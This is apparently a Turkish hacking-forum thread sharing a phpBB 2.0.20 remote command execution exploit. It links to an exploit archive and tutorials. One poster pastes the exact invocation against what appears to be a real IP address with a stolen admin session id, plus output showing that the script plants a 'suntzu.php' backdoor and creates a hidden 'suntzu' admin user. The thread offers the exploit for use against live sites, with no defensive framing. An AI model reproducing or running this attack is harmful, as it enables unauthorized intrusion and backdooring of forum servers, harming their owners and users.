Phpbb 2.0.20 Remote Exploit
-
fistana özendim ben de küfretcem alın aq
http://www.milw0rm.com/exploits/1780
-
abü bu yenilrmi içilirmi demiyecem
http://www.tahribat.com/doc.asp?docid=38
http://www.tahribat.com/doc.asp?docid=49 -
deneyek bakam eywallah
-
bu saatte ya ben yanlıs yapıom uykuluyum :D yada line 1 de sorun var :)
-
Ben çalıştırdım. Kullanabilmek için admin'in sessid bilgisi gerekiyor.
xxx@xxx ~ $ php phpbb.php 83.137.192.245 / 7d86cc9f4ba244d77cacc28c0e0d3c59 ls
PhpBB <= v2.0.20 "Admin/Restore Database/default_lang remote commands execution
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
-> you need an admin sid, works regardless of magic_quotes_gpc settings
tested and working against a fresh PhpBB installation
step 0 -> check if suntzu.php is already installed...
Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try to login as suntzu...
step 0c -> query database to create a "suntzu" user with password "suntzu"...
Unable to modify table... maybe wrong admin sid
Toplam Hit: 13700 Toplam Mesaj: 5
